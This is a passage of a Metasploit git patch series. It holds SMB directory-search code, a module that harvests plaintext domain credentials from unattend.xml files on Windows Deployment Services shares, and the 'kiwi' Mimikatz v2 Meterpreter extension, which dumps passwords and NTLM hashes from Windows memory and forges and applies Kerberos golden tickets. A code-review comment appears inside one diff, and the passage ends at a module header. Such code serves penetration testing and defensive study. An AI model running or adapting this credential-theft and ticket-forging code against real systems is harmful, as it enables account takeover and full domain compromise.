+ 6, # Resume and Close on End of Search + 260, # Level of interest + 0, # Storage type is zero + ].pack('vvvvV') + path + "\x00" - begin - resp = trans2(CONST::TRANS2_FIND_FIRST2, parm, '') - search_next = 0 - begin - pcnt = resp['Payload'].v['ParamCount'] - dcnt = resp['Payload'].v['DataCount'] - poff = resp['Payload'].v['ParamOffset'] - doff = resp['Payload'].v['DataOffset'] + begin + resp = trans2(CONST::TRANS2_FIND_FIRST2, parm, '') + search_next = 0 + begin + pcnt = resp['Payload'].v['ParamCount'] + dcnt = resp['Payload'].v['DataCount'] + poff = resp['Payload'].v['ParamOffset'] + doff = resp['Payload'].v['DataOffset'] - # Get the raw packet bytes - resp_rpkt = resp.to_s + # Get the raw packet bytes + resp_rpkt = resp.to_s - # Remove the NetBIOS header - resp_rpkt.slice!(0, 4) + # Remove the NetBIOS header + resp_rpkt.slice!(0, 4) - resp_parm = resp_rpkt[poff, pcnt] - resp_data = resp_rpkt[doff, dcnt] + resp_parm = resp_rpkt[poff, pcnt] + resp_data = resp_rpkt[doff, dcnt] - if search_next == 0 - # search id, search count, end of search, error offset, last name offset - sid, scnt, eos, eoff, loff = resp_parm.unpack('v5') - else - # FINX_NEXT doesn't return a SID - scnt, eos, eoff, loff = resp_parm.unpack('v4') - end - didx = 0 - while (didx < resp_data.length) - info_buff = resp_data[didx, 70] - break if info_buff.length != 70 - info = info_buff.unpack( - 'V'+ # Next Entry Offset - 'V'+ # File Index - 'VV'+ # Time Create - 'VV'+ # Time Last Access - 'VV'+ # Time Last Write - 'VV'+ # Time Change - 'VV'+ # End of File - 'VV'+ # Allocation Size - 'V'+ # File Attributes - 'V'+ # File Name Length - 'V'+ # Extended Attr List Length - 'C'+ # Short File Name Length - 'C' # Reserved - ) - name = resp_data[didx + 70 + 24, info[15]].sub!(/\x00+$/, '') - files[name] = - { - 'type' => (info[14] & 0x10) ? 
'D' : 'F', - 'attr' => info[14], - 'info' => info - } + if search_next == 0 + # search id, search count, end of search, error offset, last name offset + sid, scnt, eos, eoff, loff = resp_parm.unpack('v5') + else + # FINX_NEXT doesn't return a SID + scnt, eos, eoff, loff = resp_parm.unpack('v4') + end + didx = 0 + while (didx < resp_data.length) + info_buff = resp_data[didx, 70] + break if info_buff.length != 70 + info = info_buff.unpack( + 'V'+ # Next Entry Offset + 'V'+ # File Index + 'VV'+ # Time Create + 'VV'+ # Time Last Access + 'VV'+ # Time Last Write + 'VV'+ # Time Change + 'VV'+ # End of File + 'VV'+ # Allocation Size + 'V'+ # File Attributes + 'V'+ # File Name Length + 'V'+ # Extended Attr List Length + 'C'+ # Short File Name Length + 'C' # Reserved + ) + name = resp_data[didx + 70 + 24, info[15]].sub!(/\x00+$/, '') + files[name] = + { + 'type' => (info[14] & 0x10) ? 'D' : 'F', + 'attr' => info[14], + 'info' => info + } - break if info[0] == 0 - didx += info[0] - end - last_search_id = sid - last_offset = loff - last_filename = name - if eos == 0 and last_offset != 0 #If we aren't at the end of the search, run find_next - resp = find_next(last_search_id, last_offset, last_filename) - search_next = 1 # Flip bit so response params will parse correctly - end - end until eos != 0 or last_offset == 0 - rescue ::Exception - raise $! - end + break if info[0] == 0 + didx += info[0] + end + last_search_id = sid + last_offset = loff + last_filename = name + if eos == 0 and last_offset != 0 #If we aren't at the end of the search, run find_next + resp = find_next(last_search_id, last_offset, last_filename) + search_next = 1 # Flip bit so response params will parse correctly + end + end until eos != 0 or last_offset == 0 + rescue ::Exception + raise $! 
+ end - return files - end + return files + end - # Supplements find_first if file/dir count exceeds max search count - def find_next(sid, resume_key, last_filename) + # Supplements find_first if file/dir count exceeds max search count + def find_next(sid, resume_key, last_filename) - parm = [ - sid, # Search ID - 20, # Maximum search count (Size of 20 keeps response to 1 packet) - 260, # Level of interest - resume_key, # Resume key from previous (Last name offset) - 6, # Close search if end of search - ].pack('vvvVv') + last_filename + "\x00" # Last filename returned from find_first or find_next - resp = trans2(CONST::TRANS2_FIND_NEXT2, parm, '') - return resp # Returns the FIND_NEXT2 response packet for parsing by the find_first function - end + parm = [ + sid, # Search ID + 20, # Maximum search count (Size of 20 keeps response to 1 packet) + 260, # Level of interest + resume_key, # Resume key from previous (Last name offset) + 6, # Close search if end of search + ].pack('vvvVv') + last_filename + "\x00" # Last filename returned from find_first or find_next + resp = trans2(CONST::TRANS2_FIND_NEXT2, parm, '') + return resp # Returns the FIND_NEXT2 response packet for parsing by the find_first function + end - # Recursively search through directories, to a max depth, searching for filenames - # that matches regex and returns path to matching files. - def file_search(current_path, regex, depth) - depth -= 1 - if depth < 0 - return - end + # Recursively search through directories, to a max depth, searching for filenames + # that matches regex and returns path to matching files. + def file_search(current_path, regex, depth) + depth -= 1 + if depth < 0 + return + end - results = find_first("#{current_path}*") - files = [] + results = find_first("#{current_path}*") + files = [] - results.each do |result| - if result[0] =~ /^(\.){1,2}$/ # Ignore . .. - next - end + results.each do |result| + if result[0] =~ /^(\.){1,2}$/ # Ignore . .. 
+ next + end - if result[1]['attr'] & CONST::SMB_EXT_FILE_ATTR_DIRECTORY > 0 - search_path = "#{current_path}#{result[0]}\\" - begin - files << file_search(search_path, regex, depth).flatten.compact - rescue Rex::Proto::SMB::Exceptions::ErrorCode => e - # Ignore permission errors - unless e.get_error(e.error_code) == 'STATUS_ACCESS_DENIED' - raise e - end - end - else - if result[0] =~ regex - files << "#{current_path}#{result[0]}" - end - end - end + if result[1]['attr'] & CONST::SMB_EXT_FILE_ATTR_DIRECTORY > 0 + search_path = "#{current_path}#{result[0]}\\" + begin + files << file_search(search_path, regex, depth).flatten.compact + rescue Rex::Proto::SMB::Exceptions::ErrorCode => e + # Ignore permission errors + unless e.get_error(e.error_code) == 'STATUS_ACCESS_DENIED' + raise e + end + end + else + if result[0] =~ regex + files << "#{current_path}#{result[0]}" + end + end + end - return files.flatten.compact - end + return files.flatten.compact + end - # Creates a new directory on the mounted tree - def create_directory(name) - files = { } - parm = [0].pack('V') + name + "\x00" - resp = trans2(CONST::TRANS2_CREATE_DIRECTORY, parm, '') - end + # Creates a new directory on the mounted tree + def create_directory(name) + files = { } + parm = [0].pack('V') + name + "\x00" + resp = trans2(CONST::TRANS2_CREATE_DIRECTORY, parm, '') + end # public read/write methods attr_accessor :native_os, :native_lm, :encrypt_passwords, :extended_security, :read_timeout, :evasion_opts diff --git a/modules/auxiliary/gather/windows_deployment_services_shares.rb b/modules/auxiliary/gather/windows_deployment_services_shares.rb index b4a5c4f48d..73647aa0e5 100644 --- a/modules/auxiliary/gather/windows_deployment_services_shares.rb +++ b/modules/auxiliary/gather/windows_deployment_services_shares.rb 
@@ -11,226 +11,226 @@ require 'rex/parser/unattend' class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::SMB - include Msf::Exploit::Remote::SMB::Authenticated - include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::SMB + include Msf::Exploit::Remote::SMB::Authenticated + include Msf::Exploit::Remote::DCERPC - include Msf::Auxiliary::Report - include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Microsoft Windows Deployment Services Unattend Gatherer', - 'Description' => %q{ - Used after discovering domain credentials with aux/scanner/dcerpc/windows_deployment_services - or if you already have domain credentials. Will attempt to connect to the RemInst share and any - Microsoft Deployment Toolkit shares (identified by comments), search for unattend files, and recover credentials. - }, - 'Author' => [ 'Ben Campbell ' ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'MSDN', 'http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx'], - [ 'URL', 'http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html'], - ], - )) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Deployment Services Unattend Gatherer', + 'Description' => %q{ + Used after discovering domain credentials with aux/scanner/dcerpc/windows_deployment_services + or if you already have domain credentials. Will attempt to connect to the RemInst share and any + Microsoft Deployment Toolkit shares (identified by comments), search for unattend files, and recover credentials. 
+ }, + 'Author' => [ 'Ben Campbell ' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'MSDN', 'http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx'], + [ 'URL', 'http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html'], + ], + )) - register_options( - [ - Opt::RPORT(445), - OptString.new('SMBDomain', [ false, "SMB Domain", '']), - ], self.class) + register_options( + [ + Opt::RPORT(445), + OptString.new('SMBDomain', [ false, "SMB Domain", '']), + ], self.class) - deregister_options('RHOST', 'CHOST', 'CPORT', 'SSL', 'SSLVersion') - end + deregister_options('RHOST', 'CHOST', 'CPORT', 'SSL', 'SSLVersion') + end - def share_type(val) - stypes = [ - 'DISK', - 'PRINTER', - 'DEVICE', - 'IPC', - 'SPECIAL', - 'TEMPORARY' - ] + def share_type(val) + stypes = [ + 'DISK', + 'PRINTER', + 'DEVICE', + 'IPC', + 'SPECIAL', + 'TEMPORARY' + ] - if val > (stypes.length - 1) - return 'UNKNOWN' - end + if val > (stypes.length - 1) + return 'UNKNOWN' + end - stypes[val] - end + stypes[val] + end - # Stolen from enumshares - Tried refactoring into simple client, but the two methods need to go in EXPLOIT::SMB and EXPLOIT::DCERPC - # and then the lanman method calls the RPC method. Suggestions where to refactor to welcomed! - def srvsvc_netshareenum - simple.connect("IPC$") - handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 'ncacn_np', ["\\srvsvc"]) - begin - dcerpc_bind(handle) - rescue Rex::Proto::SMB::Exceptions::ErrorCode => e - print_error("#{rhost} : #{e.message}") - return - end + # Stolen from enumshares - Tried refactoring into simple client, but the two methods need to go in EXPLOIT::SMB and EXPLOIT::DCERPC + # and then the lanman method calls the RPC method. Suggestions where to refactor to welcomed! 
+ def srvsvc_netshareenum + simple.connect("IPC$") + handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 'ncacn_np', ["\\srvsvc"]) + begin + dcerpc_bind(handle) + rescue Rex::Proto::SMB::Exceptions::ErrorCode => e + print_error("#{rhost} : #{e.message}") + return + end - stubdata = - NDR.uwstring("\\\\#{rhost}") + - NDR.long(1) #level + stubdata = + NDR.uwstring("\\\\#{rhost}") + + NDR.long(1) #level - ref_id = stubdata[0,4].unpack("V")[0] - ctr = [1, ref_id + 4 , 0, 0].pack("VVVV") + ref_id = stubdata[0,4].unpack("V")[0] + ctr = [1, ref_id + 4 , 0, 0].pack("VVVV") - stubdata << ctr - stubdata << NDR.align(ctr) - stubdata << ["FFFFFFFF"].pack("H*") - stubdata << [ref_id + 8, 0].pack("VV") - response = dcerpc.call(0x0f, stubdata) - res = response.dup - win_error = res.slice!(-4, 4).unpack("V")[0] - if win_error != 0 - raise "DCE/RPC error : Win_error = #{win_error + 0}" - end - #remove some uneeded data - res.slice!(0,12) # level, CTR header, Reference ID of CTR - share_count = res.slice!(0, 4).unpack("V")[0] - res.slice!(0,4) # Reference ID of CTR1 - share_max_count = res.slice!(0, 4).unpack("V")[0] + stubdata << ctr + stubdata << NDR.align(ctr) + stubdata << ["FFFFFFFF"].pack("H*") + stubdata << [ref_id + 8, 0].pack("VV") + response = dcerpc.call(0x0f, stubdata) + res = response.dup + win_error = res.slice!(-4, 4).unpack("V")[0] + if win_error != 0 + raise "DCE/RPC error : Win_error = #{win_error + 0}" + end + #remove some uneeded data + res.slice!(0,12) # level, CTR header, Reference ID of CTR + share_count = res.slice!(0, 4).unpack("V")[0] + res.slice!(0,4) # Reference ID of CTR1 + share_max_count = res.slice!(0, 4).unpack("V")[0] - raise "Dce/RPC error : Unknow situation encountered count != count max (#{share_count}/#{share_max_count})" if share_max_count != share_count + raise "Dce/RPC error : Unknow situation encountered count != count max (#{share_count}/#{share_max_count})" if share_max_count != share_count - types = res.slice!(0, 
share_count * 12).scan(/.{12}/n).map{|a| a[4,2].unpack("v")[0]} # RerenceID / Type / ReferenceID of Comment + types = res.slice!(0, share_count * 12).scan(/.{12}/n).map{|a| a[4,2].unpack("v")[0]} # RerenceID / Type / ReferenceID of Comment - share_count.times do |t| - length, offset, max_length = res.slice!(0, 12).unpack("VVV") - raise "Dce/RPC error : Unknow situation encountered offset != 0 (#{offset})" if offset != 0 - raise "Dce/RPC error : Unknow situation encountered length !=max_length (#{length}/#{max_length})" if length != max_length - name = res.slice!(0, 2 * length).gsub('\x00','') - res.slice!(0,2) if length % 2 == 1 # pad + share_count.times do |t| + length, offset, max_length = res.slice!(0, 12).unpack("VVV") + raise "Dce/RPC error : Unknow situation encountered offset != 0 (#{offset})" if offset != 0 + raise "Dce/RPC error : Unknow situation encountered length !=max_length (#{length}/#{max_length})" if length != max_length + name = res.slice!(0, 2 * length).gsub('\x00','') + res.slice!(0,2) if length % 2 == 1 # pad - comment_length, comment_offset, comment_max_length = res.slice!(0, 12).unpack("VVV") - raise "Dce/RPC error : Unknow situation encountered comment_offset != 0 (#{comment_offset})" if comment_offset != 0 - if comment_length != comment_max_length - raise "Dce/RPC error : Unknow situation encountered comment_length != comment_max_length (#{comment_length}/#{comment_max_length})" - end - comment = res.slice!(0, 2 * comment_length).gsub('\x00','') - res.slice!(0,2) if comment_length % 2 == 1 # pad + comment_length, comment_offset, comment_max_length = res.slice!(0, 12).unpack("VVV") + raise "Dce/RPC error : Unknow situation encountered comment_offset != 0 (#{comment_offset})" if comment_offset != 0 + if comment_length != comment_max_length + raise "Dce/RPC error : Unknow situation encountered comment_length != comment_max_length (#{comment_length}/#{comment_max_length})" + end + comment = res.slice!(0, 2 * comment_length).gsub('\x00','') + 
res.slice!(0,2) if comment_length % 2 == 1 # pad - @shares << [ name, share_type(types[t]), comment] - end - end + @shares << [ name, share_type(types[t]), comment] + end + end - def run_host(ip) + def run_host(ip) - @shares = [] - deploy_shares = [] + @shares = [] + deploy_shares = [] - begin - connect - smb_login - srvsvc_netshareenum + begin + connect + smb_login + srvsvc_netshareenum - @shares.each do |share| - # I hate unicode, couldn't find any other way to get these to compare! - # look at iconv for 1.8/1.9 compatability? - if (share[0].unpack('H*') == "REMINST\x00".encode('utf-16LE').unpack('H*')) || - (share[2].unpack('H*') == "MDT Deployment Share\x00".encode('utf-16LE').unpack('H*')) + @shares.each do |share| + # I hate unicode, couldn't find any other way to get these to compare! + # look at iconv for 1.8/1.9 compatability? + if (share[0].unpack('H*') == "REMINST\x00".encode('utf-16LE').unpack('H*')) || + (share[2].unpack('H*') == "MDT Deployment Share\x00".encode('utf-16LE').unpack('H*')) - print_status("#{ip}:#{rport} #{share[0]} - #{share[1]} - #{share[2]}") - deploy_shares << share[0] - end - end + print_status("#{ip}:#{rport} #{share[0]} - #{share[1]} - #{share[2]}") + deploy_shares << share[0] + end + end - deploy_shares.each do |deploy_share| - query_share(ip, deploy_share) - end + deploy_shares.each do |deploy_share| + query_share(ip, deploy_share) + end - rescue ::Interrupt - raise $! - end - end + rescue ::Interrupt + raise $! 
+ end + end - def query_share(rhost, deploy_share) - share_path = "\\\\#{rhost}\\#{deploy_share}" - print_status("Enumerating #{share_path}") - table = Rex::Ui::Text::Table.new({ - 'Header' => share_path, - 'Indent' => 1, - 'Columns' => ['Path', 'Type', 'Domain', 'Username', 'Password'] - }) + def query_share(rhost, deploy_share) + share_path = "\\\\#{rhost}\\#{deploy_share}" + print_status("Enumerating #{share_path}") + table = Rex::Ui::Text::Table.new({ + 'Header' => share_path, + 'Indent' => 1, + 'Columns' => ['Path', 'Type', 'Domain', 'Username', 'Password'] + }) - creds_found = false + creds_found = false - # ruby 1.8 compat? - share = deploy_share.force_encoding('utf-16LE').encode('ASCII-8BIT').strip + # ruby 1.8 compat? + share = deploy_share.force_encoding('utf-16LE').encode('ASCII-8BIT').strip - begin - simple.connect(share) - rescue ::Exception => e - print_error("#{share_path} - #{e}") - return - end + begin + simple.connect(share) + rescue ::Exception => e + print_error("#{share_path} - #{e}") + return + end - results = simple.client.file_search("\\", /unattend.xml$/i, 10) + results = simple.client.file_search("\\", /unattend.xml$/i, 10) - results.each do |file_path| - file = simple.open(file_path, 'o').read() + results.each do |file_path| + file = simple.open(file_path, 'o').read() - unless file.nil? - loot_unattend(file) + unless file.nil? + loot_unattend(file) - creds = parse_client_unattend(file) - creds.each do |cred| - unless cred.empty? - unless cred['username'].nil? || cred['password'].nil? - print_good("Retrived #{cred['type']} credentials from #{file_path}") - creds_found = true - domain = "" - domain = cred['domain'] if cred['domain'] - report_creds(domain, cred['username'], cred['password']) - table << [file_path, cred['type'], domain, cred['username'], cred['password']] - end - end - end - end - end + creds = parse_client_unattend(file) + creds.each do |cred| + unless cred.empty? + unless cred['username'].nil? || cred['password'].nil? 
+ print_good("Retrived #{cred['type']} credentials from #{file_path}") + creds_found = true + domain = "" + domain = cred['domain'] if cred['domain'] + report_creds(domain, cred['username'], cred['password']) + table << [file_path, cred['type'], domain, cred['username'], cred['password']] + end + end + end + end + end - if creds_found - print_line - table.print - print_line - else - print_error("No Unattend files found.") - end - end + if creds_found + print_line + table.print + print_line + else + print_error("No Unattend files found.") + end + end - def parse_client_unattend(data) - begin - xml = REXML::Document.new(data) + def parse_client_unattend(data) + begin + xml = REXML::Document.new(data) - rescue REXML::ParseException => e - print_error("Invalid XML format") - vprint_line(e.message) - end + rescue REXML::ParseException => e + print_error("Invalid XML format") + vprint_line(e.message) + end - return Rex::Parser::Unattend.parse(xml).flatten - end + return Rex::Parser::Unattend.parse(xml).flatten + end - def loot_unattend(data) - return if data.empty? - p = store_loot('windows.unattend.raw', 'text/plain', rhost, data, "Windows Deployment Services") - print_status("Raw version saved as: #{p}") - end + def loot_unattend(data) + return if data.empty? + p = store_loot('windows.unattend.raw', 'text/plain', rhost, data, "Windows Deployment Services") + print_status("Raw version saved as: #{p}") + end - def report_creds(domain, user, pass) - report_auth_info( - :host => rhost, - :port => 445, - :sname => 'smb', - :proto => 'tcp', - :source_id => nil, - :source_type => "aux", - :user => "#{domain}\\#{user}", - :pass => pass) - end + def report_creds(domain, user, pass) + report_auth_info( + :host => rhost, + :port => 445, + :sname => 'smb', + :proto => 'tcp', + :source_id => nil, + :source_type => "aux", + :user => "#{domain}\\#{user}", + :pass => pass) + end end From 0f722cbe6db49738698ebe87637c595ca84884df Mon Sep 17 00:00:00 2001 
From: OJ Date: Fri, 10 Jan 2014 16:51:01 +1000 Subject: [PATCH 008/853] Add ext_server_kiwi, which is Mimikatz v2 This is a separate extension because the new version doesn't support as many operating systems as the old version, but it does have more new features which are really funky. --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 116 +++++++++++ .../post/meterpreter/extensions/kiwi/tlv.rb | 28 +++ .../ui/console/command_dispatcher/kiwi.rb | 186 ++++++++++++++++++ 3 files changed, 330 insertions(+) create mode 100644 lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb create mode 100644 lib/rex/post/meterpreter/extensions/kiwi/tlv.rb create mode 100644 lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb new file mode 100644 index 0000000000..344ee25912 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb 
@@ -0,0 +1,116 @@ +# -*- coding: binary -*- + +require 'rex/post/meterpreter/extensions/kiwi/tlv' +require 'csv' + +module Rex +module Post +module Meterpreter +module Extensions +module Kiwi + +### +# +# Kiwi extension - grabs credentials from windows memory. +# +# Benjamin DELPY `gentilkiwi` +# http://blog.gentilkiwi.com/mimikatz +# +# extension converted by OJ Reeves (TheColonial) +### + +class Kiwi < Extension + + PWD_ID_SEK_ALLPASS = 0 + PWD_ID_SEK_WDIGEST = 1 + PWD_ID_SEK_MSV = 2 + PWD_ID_SEK_KERBEROS = 3 + PWD_ID_SEK_TSPKG = 4 + PWD_ID_SEK_LIVESSP = 5 + PWD_ID_SEK_SSP = 6 + PWD_ID_SEK_TICKETS = 7 + PWD_ID_SEK_DPAPI = 8 + + def initialize(client) + super(client, 'kiwi') + + client.register_extension_aliases( + [ + { + 'name' => 'kiwi', + 'ext' => self + }, + ]) + end + + def golden_ticket_use(ticket) + request = Packet.create_request('kiwi_golden_ticket_use') + request.add_tlv(TLV_TYPE_KIWI_GOLD_TICKET, ticket, false, true) + + client.send_request(request) + end + + def golden_ticket_create(user, domain, sid, tgt) + request = Packet.create_request('kiwi_golden_ticket_create') + request.add_tlv(TLV_TYPE_KIWI_GOLD_USER, user) + request.add_tlv(TLV_TYPE_KIWI_GOLD_DOMAIN, domain) + request.add_tlv(TLV_TYPE_KIWI_GOLD_SID, sid) + request.add_tlv(TLV_TYPE_KIWI_GOLD_TGT, tgt) + + response = client.send_request(request) + + return response.get_tlv_value(TLV_TYPE_KIWI_GOLD_TICKET) + end + + def scrape_passwords(pwd_id) + request = Packet.create_request('kiwi_scrape_passwords') + request.add_tlv(TLV_TYPE_KIWI_PWD_ID, pwd_id) + response = client.send_request(request) + + results = [] + response.each(TLV_TYPE_KIWI_PWD_RESULT) do |r| + results << { + :username => r.get_tlv_value(TLV_TYPE_KIWI_PWD_USERNAME), + :domain => r.get_tlv_value(TLV_TYPE_KIWI_PWD_DOMAIN), + :password => r.get_tlv_value(TLV_TYPE_KIWI_PWD_PASSWORD), + :auth_hi => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_HI), + :auth_lo => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_LO), + :lm => 
r.get_tlv_value(TLV_TYPE_KIWI_PWD_LMHASH), + :ntlm => r.get_tlv_value(TLV_TYPE_KIWI_PWD_NTLMHASH) + } + end + + return results + end + + def all_pass + return scrape_passwords(PWD_ID_SEK_ALLPASS) + end + + def wdigest + return scrape_passwords(PWD_ID_SEK_WDIGEST) + end + + def msv + return scrape_passwords(PWD_ID_SEK_MSV) + end + + def livessp + return scrape_passwords(PWD_ID_SEK_LIVESSP) + end + + def ssp + return scrape_passwords(PWD_ID_SEK_SSP) + end + + def tspkg + return scrape_passwords(PWD_ID_SEK_TSPKG) + end + + def kerberos + return scrape_passwords(PWD_ID_SEK_KERBEROS) + end +end + +end; end; end; end; end + diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb new file mode 100644 index 0000000000..46efabf911 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb 
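Review bot: `require 'csv'` at the top of the new kiwi.rb is not used anywhere in this file and can be dropped. None of the methods has a comment, and the positional `false, true` in `request.add_tlv(TLV_TYPE_KIWI_GOLD_TICKET, ticket, false, true)` cannot be read at the call site; a one-line comment naming the two flags would help, since their meaning is defined outside this hunk. `PWD_ID_SEK_TICKETS` and `PWD_ID_SEK_DPAPI` are declared but no wrapper uses them, so mark them as reserved in a comment or remove them. `golden_ticket_create` returns `response.get_tlv_value(TLV_TYPE_KIWI_GOLD_TICKET)` unchecked, so its doc comment should state that the result may be nil.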
@@ -0,0 +1,28 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Kiwi
+
+TLV_TYPE_KIWI_PWD_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1)
+TLV_TYPE_KIWI_PWD_RESULT = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 2)
+TLV_TYPE_KIWI_PWD_USERNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
+TLV_TYPE_KIWI_PWD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
+TLV_TYPE_KIWI_PWD_PASSWORD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5)
+TLV_TYPE_KIWI_PWD_AUTH_HI = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 6)
+TLV_TYPE_KIWI_PWD_AUTH_LO = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 7)
+TLV_TYPE_KIWI_PWD_LMHASH = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 8)
+TLV_TYPE_KIWI_PWD_NTLMHASH = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9)
+
+TLV_TYPE_KIWI_GOLD_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 10)
+TLV_TYPE_KIWI_GOLD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 11)
+TLV_TYPE_KIWI_GOLD_SID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 12)
+TLV_TYPE_KIWI_GOLD_TGT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 13)
+TLV_TYPE_KIWI_GOLD_TICKET = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 14)
+
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
new file mode 100644
index 0000000000..39f6be508f
--- /dev/null
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
@@ -0,0 +1,186 @@ +# -*- coding: binary -*- +require 'rex/post/meterpreter' + +module Rex +module Post +module Meterpreter +module Ui + +### +# +# Kiwi extension - grabs credentials from windows memory. +# +# Benjamin DELPY `gentilkiwi` +# http://blog.gentilkiwi.com/mimikatz +# +# extension converted by OJ Reeves (TheColonial) +### +class Console::CommandDispatcher::Kiwi + + Klass = Console::CommandDispatcher::Kiwi + + include Console::CommandDispatcher + + # + # Initializes an instance of the priv command interaction. + # + def initialize(shell) + super + if (client.platform =~ /x86/) and (client.sys.config.sysinfo['Architecture'] =~ /x64/) + print_line + print_warning "Loaded x86 Kiwi on an x64 architecture." + end + end + + # + # List of supported commands. + # + def commands + { + "creds_wdigest" => "Attempt to retrieve WDigest creds", + "creds_msv" => "Attempt to retrieve LM/NTLM creds (hashes)", + "creds_livessp" => "Attempt to retrieve LiveSSP creds", + "creds_ssp" => "Attempt to retrieve SSP creds", + "creds_tspkg" => "Attempt to retrieve TsPkg creds", + "creds_kerberos" => "Attempt to retrieve Kerberos creds", + "creds_all" => "Attempt to retrieve all credentials", + "golden_ticket_create" => "Attempt to create a golden kerberos ticket", + "golden_ticket_use" => "Attempt to use a golden kerberos ticket" + } + end + + def scrape_passwords(provider, method) + get_privs + print_status("Retrieving #{provider} credentials") + accounts = method.call + + table = Rex::Ui::Text::Table.new( + 'Header' => "#{provider} credentials", + 'Indent' => 0, + 'SortIndex' => 4, + 'Columns' => + [ + 'Domain', 'User', 'Password', 'Auth Id', 'LM Hash', 'NTLM Hash' + ] + ) + + accounts.each do |acc| + table << [ + acc[:domain], + acc[:username], + acc[:password], + "#{acc[:auth_hi]} ; #{acc[:auth_lo]}", + acc[:lm], + acc[:ntlm] + ] + end + + print_line table.to_s + return true + end + + def cmd_golden_ticket_create(*args) + if args.length != 5 + print_line("Usage: 
golden_ticket_create user domain sid tgt ticketpath") + return + end + + user = args[0] + domain = args[1] + sid = args[2] + tgt = args[3] + target = args[4] + ticket = client.kiwi.golden_ticket_create(user, domain, sid, tgt) + ::File.open( target, 'wb' ) do |f| + f.write ticket + end + print_good("Golden ticket written to #{target}") + end + + def cmd_golden_ticket_use(*args) + if args.length != 1 + print_line("Usage: golden_ticket_use ticketpath") + return + end + + target = args[0] + ticket = '' + ::File.open(target, 'rb') do |f| + ticket += f.read(f.stat.size) + end + print_status("Using ticket stored in #{target}, #{ticket.length} bytes") + client.kiwi.golden_ticket_use(ticket) + print_good("Ticket applied successfully") + end + + def cmd_creds_all(*args) + method = Proc.new { client.kiwi.all_pass } + scrape_passwords("all", method) + end + + def cmd_creds_wdigest(*args) + method = Proc.new { client.kiwi.wdigest } + scrape_passwords("wdigest", method) + end + + def cmd_creds_msv(*args) + method = Proc.new { client.kiwi.msv } + scrape_passwords("msv", method) + end + + def cmd_creds_livessp(*args) + method = Proc.new { client.kiwi.livessp } + scrape_passwords("livessp", method) + end + + def cmd_creds_ssp(*args) + method = Proc.new { client.kiwi.ssp } + scrape_passwords("ssp", method) + end + + def cmd_creds_tspkg(*args) + method = Proc.new { client.kiwi.tspkg } + scrape_passwords("tspkg", method) + end + + def cmd_creds_kerberos(*args) + method = Proc.new { client.kiwi.kerberos } + scrape_passwords("kerberos", method) + end + + def get_privs + unless system_check + print_status("Attempting to getprivs") + privs = client.sys.config.getprivs + unless privs.include? 
"SeDebugPrivilege" + print_warning("Did not get SeDebugPrivilege") + else + print_good("Got SeDebugPrivilege") + end + else + print_good("Running as SYSTEM") + end + end + + def system_check + unless (client.sys.config.getuid == "NT AUTHORITY\\SYSTEM") + print_warning("Not currently running as SYSTEM") + return false + end + + return true + end + + # + # Name for this dispatcher + # + def name + "Kiwi" + end +end + +end +end +end +end + From 9a81420e9065267eb40f9747fa9debf52b749be0 Mon Sep 17 00:00:00 2001 From: jiuweigui Date: Fri, 10 Jan 2014 13:21:47 +0200 Subject: [PATCH 009/853] Enumerate WinXP/7 MUICache registry key --- modules/post/windows/gather/enum_muicache.rb | 278 +++++++++++++++++++ 1 file changed, 278 insertions(+) create mode 100644 modules/post/windows/gather/enum_muicache.rb diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb new file mode 100644 index 0000000000..273305939d --- /dev/null +++ b/modules/post/windows/gather/enum_muicache.rb 
